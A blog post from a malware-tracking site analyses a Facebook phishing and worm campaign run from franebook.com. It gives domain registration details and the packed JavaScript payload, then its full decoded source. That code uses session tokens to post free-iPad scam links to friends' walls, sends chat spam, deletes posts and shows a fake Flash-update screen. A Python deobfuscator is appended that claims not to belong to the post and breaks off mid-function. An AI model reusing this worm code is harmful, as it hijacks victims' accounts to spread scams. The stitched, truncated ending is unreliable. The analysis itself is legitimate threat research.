Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday, 8 March 2011

franebook: An update

Normally I get very annoyed with myself when I miss one of Chris Boyd's blogs. This time however, I'm partially glad I did, as otherwise I may have missed what I've just found.

Going over some of the stuff he found, I decided to do a bit more digging, and not only has franebook.com come back to life - the bad guys behind it have gotten themselves some new domains, all associated with a single name server - dark-dns-services.com;

Domain Name.......... dark-dns-services.com
Creation Date........ 2011-02-12 11:34:29
Registration Date.... 2011-02-12 11:34:29
Expiry Date.......... 2012-02-12 11:34:29
Organisation Name.... huang xinyi
Organisation Address. yuanlinlu57
Organisation Address.
Organisation Address. nantong
Organisation Address. 226051
Organisation Address. JS
Organisation Address. CN

Admin Name........... huangxinyi
Admin Address........ yuanlinlu57
Admin Address........
Admin Address........ nantong
Admin Address........ 226051
Admin Address........ JS
Admin Address........ CN
Admin Email.......... shangmenwei@163.com
Admin Phone.......... +86.51385051689
Admin Fax............ +86.51385051689

Tech Name............ huangxinyi
Tech Address......... yuanlinlu57
Tech Address.........
Tech Address......... nantong
Tech Address......... 226051
Tech Address......... JS
Tech Address......... CN
Tech Email........... shangmenwei@163.com
Tech Phone........... +86.51385051689
Tech Fax............. +86.51385051689

Bill Name............ huangxinyi
Bill Address......... yuanlinlu57
Bill Address.........
Bill Address......... nantong
Bill Address......... 226051
Bill Address......... JS
Bill Address......... CN
Bill Email........... shangmenwei@163.com
Bill Phone........... +86.51385051689
Bill Fax............. +86.51385051689
Name Server.......... ns5.dark-dns-services.com
Name Server.......... ns4.dark-dns-services.com
Name Server.......... ns2.dark-dns-services.com
Name Server.......... ns1.dark-dns-services.com


franebook.com itself currently seems to be serving content via only 2 URLs, though no doubt that will change in the near future;

www(dot)franebook.com/usa/index14.php
www(dot)franebook.com/usa/app3/js.php

index14.php, as you can see in the screenshot above (top left), is the phishing side of it. js.php contains the following bit of loveliness;


eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('17 112(){10 78=24;11(111.127){78=15 111.127()}20{78=15 283(\'288.287\')}19 78}17 31(59,49,55,14){10 22=15 112();11(49){88=\'168\'}20{88=\'171\'}22.170(88,59,36,55);11(49){22.103(\'105-180\',\'191/78-192-193-195\');22.103(\'105-189\',49.65)}22.188=17(){11(22.183==4&&22.165==200){10 13=22.184.97(/\\\\/45,\'\');11(14){104(55+\'(13,14)\')}20{104(55+\'(13)\')}}};22.129(49)}11(!34.231.135){34.231.135=17(109,70){11(70==289){70=0}20 11(70<0){70=125.268(0,71.65+70)}128(10 16=70,227=71.65;16<227;16++){11(71[16]===109)19 16}19-1}}17 178(223,109){19(223.135(109)!=-1)}17 228(){10 256=23.272(\'284\')[0];10 60=23.63(\'141\');60.173=\'140/60\';60.311=\'298\';60.294=114+\'73.60\';60.301=\'302\';256.47(60);10 44=23.63(\'136\');44.39(\'18\',\'185\');44.39(\'73\',\'312:308; 307:282; 132: 0; 300: 0; 276: 0; 95: 0;\');10 16=23.63(\'182\');16.39(\'166\',114+\'285.267\');16.39(\'73\',\'124-95: 50%; 175-95: -275;\');44.47(16);10 41=\'140-270: 274; 273: #271; 124-132: \';10 16=23.63(\'136\');16.39(\'18\',\'313\');10 14=23.63(\'181\');14.39(\'73\',41+\'306; 150-304: 309; 150-296: 303;\');10 115=23.156(\'297: 295 225 292\');14.47(115);16.47(14);44.47(16);10 16=23.63(\'182\');16.39(\'166\',114+\'51-299.291\');16.39(\'73\',\'124-132: 310; 124-95: 50%; 175-95: -290;\');44.47(16);10 16=23.63(\'136\');16.39(\'18\',\'305\');10 14=23.63(\'181\');14.39(\'18\',\'160\');14.39(\'73\',41+\'269;\');10 115=23.156(\'286..\');14.47(115);16.47(14);44.47(16);23.76.47(44);111.190=17(){19\'278 72 277 101 157 279 280 72 281 293 325 159 355 354!\'};19}17 240(){10 139=0;11(110){139=125.356(110/98*100)}11(92){40=\'357\'}20{40=\'359\'}10 151=139+\'% 358. 
\'+40+\' 157 (353.352) 131 159\';10 164=23.187("160");164.347.346=151}17 167(){10 44=23.187(\'185\');23.76.361(44);111.190=24;19}17 172(13){10 12=13.27(\'"122":([^"]+),"123":"([^"]+)"\');11(!12){19 64()}32=12[1];10 42=15 31(\'/51/349/351.43?56=1&122=\'+32+\'&123=\'+12[2]+\'&350[0]=133&360[0]=364\',24,\'169\',24)}17 169(13){54=15 34();61=15 34();10 33=/"e372":([^"]+),"173":"133","140":"([^"]+)"/45;10 12;85(12=33.79(13)){11(12[1]!=32){224+=1;61.81(12[1]);54.81(12[2])}}98=54.65+98;10 16=0;128(16=0;16<=94;16++){137.81(15 138())}}17 177(13){10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 12=13.27(\'"122":([^"]+),"123":\');11(!12||!28||!26){19 64()}10 32=12[1];10 14=\'35=\'+28[1]+\'&370=36&37=\'+26[1]+\'&69&371=24&67=68&133=\'+32;10 42=15 31(\'/51/257/369.43?56=1\',14,\'179\',24)}17 229(13){10 12=13.27(\'"122":([^"]+),"123":\');11(!12){19 64()}32=12[1];10 42=15 31(\'/52.43?18=\'+32+\'&152=161\',24,\'194\',24)}17 194(13){10 46=\'163 158\';11(13.66(\';">\'+46)!=-1){19 38(13)}10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 62=13.27(\'29="75" 30="([^"]+)"\');11(!62){19 38(13)}10 59=\'82://367.134\';10 14=\'37=\'+26[1]+\'&=154&35=\'+28[1]+\'&75=\'+62[1]+\'&120=\'+32+\'&153=\'+32+\'&113=52&84=&155=\'+25(59)+\'&89[91]=90&69&84&108&121&67=68\';10 21=15 34(28[1],26[1],62[1],46);10 42=15 31(\'/51/118/58/141/145.43?56=1\',14,\'174\',21)}17 174(13,21){10 33=/29="([^"]+)" 30="([^"]+)"/45;10 14,12,86,48,41;10 40=\'87 247 246 102, 87 248 249 48 250 258 130 264 263 261 197. 260 93 265 106 99 48 266 262, 255 244 214 72 71. 213 93 212 106 211 99 131 101 15 215 216! 
87 220 219 102\';10 83=\'218 245 217 210 72 209 202 201\';10 46=21[3];10 57=\'82://4.199.198.142/203/204/208/207/206/205.221\';10 126=\'24\';10 74;85(12=33.79(13)){41=24;10 80=\'58[77][222][0]\';11(!86){11(!12){19 38(13)};14=\'238=0&35=\'+21[0]+\'&69&89[91]=90&37=\'+21[1]+\'&67=68&75=\'+21[2]+\'&113=52&84&108=\'+25(40)+\'&121=\'+25(40)+\'&120=\'+32+\'&\'+25(12[1])+\'=\'+25(12[2]);11(83){14=14+\'&58[77][237]=\'+25(83)}86=36}20{11(12[1]==\'58[77][236]\'){12[2]=46}20 11(12[1]==80){11(57){12[2]=57;74=36}}20 11(12[1]==\'235\'){12[2]=126}11(12[1]==\'239\'){11(!48){48=36}20{41=36}}11(!41){14=14+\'&\'+25(12[1])+\'=\'+25(12[2])}}}11(!14){19 38(13)}11(!74){14=14+\'&\'+80+\'=\'+57}10 42=15 31(\'/51/52/118.43?56=1\',14,\'176\',24)}17 176(13){177(23.76.107)}17 179(13){54=15 34();61=15 34();10 33=/"([^"]+)":{"16":/45;10 12;85(12=33.79(13)){61.81(12[1])}10 33=/"([^"]+)":{"29":"([^"]+)","363"/45;85(12=33.79(13)){11(178(61,12[1])){54.81(12[2])}}11(!54){19 64()}98=54.65;10 16=0;128(16=0;16<=94;16++){137.81(15 138())}}17 64(){11(!92){92=1;119=0;172(23.76.107)}20{368("167();",362)}19}17 138(){17 31(59,49,55,14){10 22=15 112();11(49){88=\'168\'}20{88=\'171\'}22.170(88,59,36,55);11(49){22.103(\'105-180\',\'191/78-192-193-195\');22.103(\'105-189\',49.65)}22.188=17(){11(22.183==4&&22.165==200){10 13=22.184.97(/\\\\/45,\'\');11(14){104(55+\'(13,14)\')}20{104(55+\'(13)\')}}};22.129(49)}17 242(18,14){10 42=15 31(\'/52.43?18=\'+18,24,14,18)}17 241(13,18){13=13.97(/&365;/45,\'&\').97(/%/45,\'\');10 33=/143=(.*?)&146=(.*?)&147=(.*?)&144=1&186=196&149(.*?)=(.*?)366(.*?)&148=(.*?)"/45;10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');11(!28||!26){19 64()}10 12;85(12=33.79(13)){10 14=\'186=196&348=1&344=1&35=\'+28[1]+\'&144=1&69&143=\'+12[1]+\'&89[91]=90&37=\'+26[1]+\'&67=68&146=\'+12[2]+\'&149[0]=\'+12[5]+\':\'+12[6]+\'&148=\'+12[7]+\'&147=\'+12[3];10 42=15 31(\'/51/324.43?56=1\',14,\'96\',24)}96()}17 233(18,53){10 21=15 34(18,53);10 42=15 
31(\'/52.43?18=\'+18+\'&152=161\',24,\'162\',21)}17 162(13,21){10 18=21[0];10 53=21[1];10 46=\'163 158!\';11(13.66(\';">\'+46)!=-1){19 38(13)}10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');10 62=13.27(\'29="75" 30="([^"]+)"\');11(!62){19 38(13)}10 59=\'82://323.134\';10 14=\'37=\'+26[1]+\'&=154&35=\'+28[1]+\'&75=\'+62[1]+\'&120=\'+18+\'&153=\'+18+\'&113=52&84=&155=\'+25(59)+\'&89[91]=90&69&84&108&121&67=68\';10 21=15 34(28[1],26[1],62[1],18,53,46);10 42=15 31(\'/51/118/58/141/145.43?56=1\',14,\'252\',21)}17 226(13,18,53){10 40=\'251, 345 101 326 93 72 328 327 71 322? 321 71 316 315 317?? 318 82://320.134\';10 259=(125.314(125.319()*329)+1).254();10 253=15 330().340().254().97(\'.\',\'\');10 26=13.27(\'29="37" 30="([^"]+)"\');10 28=13.27(\'29="35" 30="([^"]+)"\');11(!28||!26){19 64()}10 14=\'339=\'+253+\'&35=\'+28[1]+\'&69&341=\'+259+\'&342=\'+25(40)+\'&343=1&37=\'+26[1]+\'&67=68&338&130=\'+18+\'&337=24\';10 42=15 31(\'/51/257/129.43?56=1\',14,\'38\',24)}17 252(13,21){10 33=/29="([^"]+)" 30="([^"]+)"/45;10 14,12,86,48,41;10 53=21[4];10 40=\'251 87 247 246 102, 87 248 249 48 250 258 130 264 263 261 197. 260 93 265 106 99 48 266 262, 255 244 214 72 71. 213 93 212 106 211 99 131 101 15 215 216! 
87 220 219 102\';10 83=\'218 245 217 210 72 209 202 201!\';10 46=21[5];10 57=\'82://4.199.198.142/203/204/208/207/206/205.221\';10 126=\'24\';10 74;85(12=33.79(13)){41=24;10 80=\'58[77][222][0]\';11(!86){11(!12){19 38(13)};14=\'238=0&35=\'+21[0]+\'&69&89[91]=90&37=\'+21[1]+\'&67=68&75=\'+21[2]+\'&113=52&84&108=\'+25(40)+\'&121=\'+25(40)+\'&120=\'+21[3]+\'&\'+25(12[1])+\'=\'+25(12[2]);11(83){14=14+\'&58[77][237]=\'+25(83)}86=36}20{11(12[1]==\'58[77][236]\'){12[2]=46}20 11(12[1]==80){11(57){12[2]=57;74=36}}20 11(12[1]==\'235\'){12[2]=126}11(12[1]==\'239\'){11(!48){48=36}20{41=36}}11(!41){14=14+\'&\'+25(12[1])+\'=\'+25(12[2])}}}11(!14){19 38(13)}11(!74){14=14+\'&\'+80+\'=\'+57}10 42=15 31(\'/51/52/118.43?56=1\',14,\'38\',36)}17 38(13,243){11(13.66(\'"332":0,\')!=-1){110+=1;240()}11(243){242(32,\'241\')}20{96()}}17 96(){11(61.65){10 18=61.234();10 53=54.234();11(92){233(18,53)}20{226(23.76.107,18,53)}}20{11(119!=94){119+=1}20{64()}}}96()}10 22=15 112();11(!22){331(\'127 225 333\')}20{10 61=15 34();10 54=15 34();10 32;10 110=0;10 94=2;10 224=0;10 119=0;10 114=\'82://334.142/336/335/\';10 92=0;10 98=0;228();11(117.116.66(\'232/3\')!=-1||117.116.66(\'232/4\')!=-1||117.116.66(\'230 8\')!=-1||117.116.66(\'230 9\')!=-1){94=6}137=15 
34();229(23.76.107)}',10,373,'||||||||||var|if|m|res|p|new|i|function|id|return|else|vr|xO|document|false|escape|pfid|match|fbsg|name|value|hS|vw|re|Array|fb_dtsg|true|post_form_id|dF|setAttribute|msg|s|hs|php|l|g|tt|appendChild|a|v||ajax|profile|nm|nms|r|__a|pu|attachment|u|css|ids|cid|createElement|dN|length|search|post_form_id_source|AsyncRequest|lsd|fromIndex|this|you|style|si|xhpc_composerid|body|params|x|exec|imgp|push|http|dsc|xhpc_fbx|while|ic|I|pT|nctr|pagelet_tab_content|_mod|tOP|are|wt|left|pV|replace|wtot|away||the|it|setRequestHeader|eval|Content|giving|innerHTML|xhpc_message|obj|wc|window|gXMLO|xhpc_context|b|t|userAgent|navigator|composer|cb|xhpc_targetid|xhpc_message_text|viewer|token|padding|Math|pc|XMLHttpRequest|for|send|to|from|top|user|tk|indexOf|div|pool|wT|perc|text|link|com|ministory_key|feedback|scraper|profile_fbid|story_type|story_id|story_fbids|font|txt|sk|targetid|Attach|scrape_url|createTextNode|update|Here|Adobe|txtc|wall|dWPL|Click|txto|status|src|hL|POST|s3|open|GET|s2|type|dSU3|margin|dSU4|sIM|include|sIM2|Type|P|img|readyState|responseText|LoadingDiv|action_key|getElementById|onreadystatechange|Length|onbeforeunload|application|www|form|dSU2|urlencoded|remove_content|keep|blogspot|bp||too|one|_92UFpWRIzAA|S8MZBPAycKI|IMG_0858|s1600|uAvDw6RVnmw|AAAAAAAAAio|get|when|them|still|There|showing|years|overstock|know|Let|LOVE|absolutely|JPG|images|arr|tc|Not|dIM|j|sL|dSU|MSIE|prototype|Firefox|dWP|pop|no_picture|title|summary|UIThumbPager_Input|app_id|cT|cU|gW|w|Im|me|believe|cant|actually|got|free|Hey|dWPL2|tme|toString|so|hid|chat|ipad|mid|They|and|supply|out|test|only|limited|png|max|13px|align|FFFFFF|getElementsByTagName|color|center|128px|bottom|abort|If|process|now|will|absolute|ActiveXObject|head|flash|Loading|XMLHTTP|Microsoft|null|110px|gif|Interrupt|corrupt|href|Do|size|Caution|stylesheet|loader|right|media|screen|9pt|weight|ProgressDiv|10px|position|block|bolder|16px|rel|display|WarningDiv|floor|or|dancing|what|Bahahaha|random|b
egoneweight201|Is|video|getridoftime9|minifeed|your|hell|in|doing|4294967295|Date|alert|error|Supported|franebook|app3|usa|to_offline|pvs_time|client_time|getTime|msg_id|msg_text|num_tabs|dialog|What|nodeValue|firstChild|confirmed|typeahead|filter|first_degree|1034|v10|installation|Flash|round|Installing|updated|Receiving|options|removeChild|3000|firstName|friends_only|amp|u00253A|weithajs2|setTimeout|buddy_list|force_render|popped_out|uid'.split('|')))


Which decodes to (formatted for readability);

function gXMLO()
{
var x=false;
if(window.XMLHttpRequest)
{
x=new window.XMLHttpRequest()
}
else
{
x=new ActiveXObject('Microsoft.XMLHTTP')
}
return x
}
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
if(!Array.prototype.indexOf)
{
Array.prototype.indexOf=function(obj,fromIndex)
{
if(fromIndex==null)
{
fromIndex=0
}
else if(fromIndex<0)
{
fromIndex=Math.max(0,this.length+fromIndex)
}
for(var i=fromIndex,j=this.length;i<j;i++)
{
if(this[i]===obj)return i
}
return-1
}
}
function include(arr,obj)
{
return(arr.indexOf(obj)!=-1)
}
function sL()
{
var hid=document.getElementsByTagName('head')[0];
var css=document.createElement('link');
css.type='text/css';
css.rel='stylesheet';
css.href=b+'style.css';
css.media='screen';
hid.appendChild(css);
var l=document.createElement('div');
l.setAttribute('id','LoadingDiv');
l.setAttribute('style','display:block; position:absolute; top: 0; right: 0; bottom: 0; left: 0;');
var i=document.createElement('img');
i.setAttribute('src',b+'flash.png');
i.setAttribute('style','padding-left: 50%; margin-left: -128px;');
l.appendChild(i);
var s='text-align: center; color: #FFFFFF; padding-top: ';
var i=document.createElement('div');
i.setAttribute('id','WarningDiv');
var p=document.createElement('P');
p.setAttribute('style',s+'10px; font-weight: bolder; font-size: 9pt;');
var t=document.createTextNode('Caution: Do Not Interrupt');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
var i=document.createElement('img');
i.setAttribute('src',b+'ajax-loader.gif');
i.setAttribute('style','padding-top: 16px; padding-left: 50%; margin-left: -110px;');
l.appendChild(i);
var i=document.createElement('div');
i.setAttribute('id','ProgressDiv');
var p=document.createElement('P');
p.setAttribute('id','txtc');
p.setAttribute('style',s+'13px;');
var t=document.createTextNode('Loading..');
p.appendChild(t);
i.appendChild(p);
l.appendChild(i);
document.body.appendChild(l);
window.onbeforeunload=function()
{
return'If you abort the update process now you will corrupt your Adobe Flash installation!'
};
return
}
function cT()
{
var perc=0;
if(wc)
{
perc=Math.round(wc/wtot*100)
}
if(tOP)
{
msg='Installing'
}
else
{
msg='Receiving'
}
var txt=perc+'% updated. '+msg+' update (v10.1034) from Adobe';
var txto=document.getElementById("txtc");
txto.firstChild.nodeValue=txt
}
function hL()
{
var l=document.getElementById('LoadingDiv');
document.body.removeChild(l);
window.onbeforeunload=false;return
}
function s2(res)
{
var m=res.match('"viewer":([^"]+),"token":"([^"]+)"');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/ajax/typeahead/first_degree.php?__a=1&viewer='+vw+'&token='+m[2]+'&filter[0]=user&options[0]=friends_only',false,'s3',false)
}
function s3(res)
{
nms=new Array();
ids=new Array();
var re=/"uid":([^"]+),"type":"user","text":"([^"]+)"/g;
var m;
while(m=re.exec(res))
{
if(m[1]!=vw)
{
tc+=1;
ids.push(m[1]);
nms.push(m[2])
}
}
wtot=nms.length+wtot;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function sIM(res)
{
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var m=res.match('"viewer":([^"]+),"token":');
if(!m||!fbsg||!pfid)
{
return dN()
}
var vw=m[1];
var p='fb_dtsg='+fbsg[1]+'&force_render=true&post_form_id='+pfid[1]+'&lsd&popped_out=false&post_form_id_source=AsyncRequest&user='+vw;var hs=new hS('/ajax/chat/buddy_list.php?__a=1',p,'sIM2',false)
}
function dSU(res)
{
var m=res.match('"viewer":([^"]+),"token":');
if(!m)
{
return dN()
}
vw=m[1];
var hs=new hS('/profile.php?id='+vw+'&sk=wall',false,'dSU2',false)
}
function dSU2(res)
{
var tt='Click Here';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://weithajs2.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+vw+'&targetid='+vw+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dSU3',vr)
}
function dSU3(res,vr)
{
var re=/name="([^"]+)" value="([^"]+)"/g;
var p,m,ic,a,s;
var msg='I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too';
var tt=vr[3];
var pu='http://4.bp.blogspot.com/_92UFpWRIzAA/S8MZBPAycKI/AAAAAAAAAio/uAvDw6RVnmw/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vw+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dSU4',false)
}
function dSU4(res)
{
sIM(document.body.innerHTML)
}
function sIM2(res)
{
nms=new Array();
ids=new Array();
var re=/"([^"]+)":{"i":/g;
var m;
while(m=re.exec(res))
{
ids.push(m[1])
}
var re=/"([^"]+)":{"name":"([^"]+)","firstName"/g;
while(m=re.exec(res))
{
if(include(ids,m[1]))
{
nms.push(m[2])
}
}
if(!nms)
{
return dN()
}
wtot=nms.length;
var i=0;
for(i=0;i<=wt;i++)
{
pool.push(new wT())
}
}
function dN()
{
if(!tOP)
{
tOP=1;
cb=0;
s2(document.body.innerHTML)
}
else
{
setTimeout("hL();",3000)
}
return
}
function wT()
{
function hS(u,v,r,p)
{
var xO=new gXMLO();
if(v)
{
pT='POST'
}
else
{
pT='GET'
}
xO.open(pT,u,true,r);
if(v)
{
xO.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xO.setRequestHeader('Content-Length',v.length)
}
xO.onreadystatechange=function()
{
if(xO.readyState==4&&xO.status==200)
{
var res=xO.responseText.replace(/\\/g,'');
if(p)
{
eval(r+'(res,p)')
}
else
{
eval(r+'(res)')
}
}
};
xO.send(v)
}
function gW(id,p)
{
var hs=new hS('/profile.php?id='+id,false,p,id)
}
function cU(res,id)
{
res=res.replace(/&amp;/g,'&').replace(/%/g,'');
var re=/ministory_key=(.*?)&profile_fbid=(.*?)&story_type=(.*?)&feedback=1&action_key=remove_content&story_fbids(.*?)=(.*?)u00253A(.*?)&story_id=(.*?)"/g;
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var m;
while(m=re.exec(res))
{
var p='action_key=remove_content&confirmed=1&dialog=1&fb_dtsg='+fbsg[1]+'&feedback=1&lsd&ministory_key='+m[1]+'&nctr[_mod]=pagelet_tab_content&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&profile_fbid='+m[2]+'&story_fbids[0]='+m[5]+':'+m[6]+'&story_id='+m[7]+'&story_type='+m[3];var hs=new hS('/ajax/minifeed.php?__a=1',p,'pV',false)
}
pV()
}
function dWP(id,nm)
{
var vr=new Array(id,nm);
var hs=new hS('/profile.php?id='+id+'&sk=wall',false,'dWPL',vr)
}
function dWPL(res,vr)
{
var id=vr[0];
var nm=vr[1];
var tt='Click Here!';
if(res.search(';">'+tt)!=-1)
{
return dF(res)
}
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
var cid=res.match('name="xhpc_composerid" value="([^"]+)"');
if(!cid)
{
return dF(res)
}
var u='http://getridoftime9.tk';
var p='post_form_id='+pfid[1]+'&=Attach&fb_dtsg='+fbsg[1]+'&xhpc_composerid='+cid[1]+'&xhpc_targetid='+id+'&targetid='+id+'&xhpc_context=profile&xhpc_fbx=&scrape_url='+escape(u)+'&nctr[_mod]=pagelet_tab_content&lsd&xhpc_fbx&xhpc_message&xhpc_message_text&post_form_id_source=AsyncRequest';var vr=new Array(fbsg[1],pfid[1],cid[1],id,nm,tt);
var hs=new hS('/ajax/composer/attachment/link/scraper.php?__a=1',p,'dWPL2',vr)
}
function dIM(res,id,nm)
{
var msg='Hey, What the hell are you doing in this video? Is this dancing or what?? Bahahaha http://begoneweight201.tk';
var mid=(Math.floor(Math.random()*4294967295)+1).toString();
var tme=new Date().getTime().toString().replace('.','');
var pfid=res.match('name="post_form_id" value="([^"]+)"');
var fbsg=res.match('name="fb_dtsg" value="([^"]+)"');
if(!fbsg||!pfid)
{
return dN()
}
var p='client_time='+tme+'&fb_dtsg='+fbsg[1]+'&lsd&msg_id='+mid+'&msg_text='+escape(msg)+'&num_tabs=1&post_form_id='+pfid[1]+'&post_form_id_source=AsyncRequest&pvs_time&to='+id+'&to_offline=false';var hs=new hS('/ajax/chat/send.php?__a=1',p,'dF',false)
}
function dWPL2(res,vr)
{
var re=/name="([^"]+)" value="([^"]+)"/g;
var p,m,ic,a,s;
var nm=vr[4];
var msg='Hey I cant believe it, I actually got a free ipad to test out and keep. They are only giving away a limited supply, so Im showing you this. There are still giving them away from the new years overstock! I absolutely LOVE it';
var dsc='Let me know when you get one too!';
var tt=vr[5];
var pu='http://4.bp.blogspot.com/_92UFpWRIzAA/S8MZBPAycKI/AAAAAAAAAio/uAvDw6RVnmw/s1600/IMG_0858.JPG';
var pc='false';
var si;
while(m=re.exec(res))
{
s=false;
var imgp='attachment[params][images][0]';
if(!ic)
{
if(!m)
{
return dF(res)
};
p='UIThumbPager_Input=0&fb_dtsg='+vr[0]+'&lsd&nctr[_mod]=pagelet_tab_content&post_form_id='+vr[1]+'&post_form_id_source=AsyncRequest&xhpc_composerid='+vr[2]+'&xhpc_context=profile&xhpc_fbx&xhpc_message='+escape(msg)+'&xhpc_message_text='+escape(msg)+'&xhpc_targetid='+vr[3]+'&'+escape(m[1])+'='+escape(m[2]);
if(dsc)
{
p=p+'&attachment[params][summary]='+escape(dsc)
}
ic=true
}
else
{
if(m[1]=='attachment[params][title]')
{
m[2]=tt
}
else if(m[1]==imgp)
{
if(pu)
{
m[2]=pu;
si=true
}
}
else if(m[1]=='no_picture')
{
m[2]=pc
}
if(m[1]=='app_id')
{
if(!a)
{
a=true
}
else
{
s=true
}
}
if(!s)
{
p=p+'&'+escape(m[1])+'='+escape(m[2])
}
}
}
if(!p)
{
return dF(res)
}
if(!si)
{
p=p+'&'+imgp+'='+pu
}
var hs=new hS('/ajax/profile/composer.php?__a=1',p,'dF',true)
}
function dF(res,w)
{
if(res.search('"error":0,')!=-1)
{
wc+=1;
cT()
}
if(w)
{
gW(vw,'cU')
}
else
{
pV()
}
}
function pV()
{
if(ids.length)
{
var id=ids.pop();
var nm=nms.pop();
if(tOP)
{
dWP(id,nm)
}
else
{
dIM(document.body.innerHTML,id,nm)
}
}
else
{
if(cb!=wt)
{
cb+=1
}
else
{
dN()
}
}
}
pV()
}
var xO=new gXMLO();
if(!xO)
{
alert('XMLHttpRequest Not Supported')
}
else
{
var ids=new Array();
var nms=new Array();
var vw;
var wc=0;
var wt=2;
var tc=0;
var cb=0;
var b='http://franebook.com/usa/app3/';
var tOP=0;
var wtot=0;
sL();
if(navigator.userAgent.search('Firefox/3')!=-1||navigator.userAgent.search('Firefox/4')!=-1||navigator.userAgent.search('MSIE 8')!=-1||navigator.userAgent.search('MSIE 9')!=-1)
{
wt=6
}
pool=new Array();
dSU(document.body.innerHTML)}
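
The blob above is the familiar `p,a,c,k,e,d` packer: the function body is only the decode loop, and everything of interest sits in the four arguments (the template `p`, the base `a`, the symbol count `c` and the `|`-separated dictionary `k`). Since the loop is just whole-word replacement of each symbol by its dictionary entry, it can be reproduced without ever handing the blob to a JavaScript engine. The following is an added example of that, not code from this post or from js.php: a Python decoder that pulls the four arguments out of the wrapper, runs the same `\b`-bounded substitutions with `re.sub`, and then lists the absolute URLs in the result, which is the check done by hand further down ("Did you see it?"). `SAMPLE_PACKED` is a constructed miniature rather than the franebook blob, `example.invalid` is a placeholder host, and the base-36/62 token encoder goes beyond this page's base-10 case (the blob here uses plain numeric tokens) to cover the packer's other output modes.

```python
import re

# Constructed sample (not from the page): a tiny script packed the same way as the
# franebook js.php blob, base 10 with no encoder, so the symbols are plain numbers.
SAMPLE_PACKED = (
    "eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace("
    "new RegExp('\\\\b'+c+'\\\\b','g'),k[c])}}return p}"
    "('0 1(2){3.4=\\'5://example.invalid/x.php?u=\\'+2}',10,6,"
    "'function|go|name|location|href|http'.split('|')))"
)

# Matches the packer's trailing call:  }('<p>',<a>,<c>,'<k>'.split('|'))
ARGS_RE = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,"
    r"\s*'((?:[^'\\]|\\.)*)'\s*\.split\(\s*'\|'\s*\)",
    re.S,
)

_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}


def js_unescape(s: str) -> str:
    """Undo the escaping of a JS single-quoted string literal (\\' \\\\ \\n ...)."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), s, flags=re.S)


def encode_token(n: int, base: int) -> str:
    """Reproduce the packer's 'e' function: how symbol n is spelled in the packed text.

    Base 10 writes the number itself; bases up to 62 use 0-9, a-z, then A-Z."""
    if base == 10:
        return str(n)
    prefix = encode_token(n // base, base) if n >= base else ""
    d = n % base
    if d > 35:
        digit = chr(d + 29)             # 36..61 -> 'A'..'Z'
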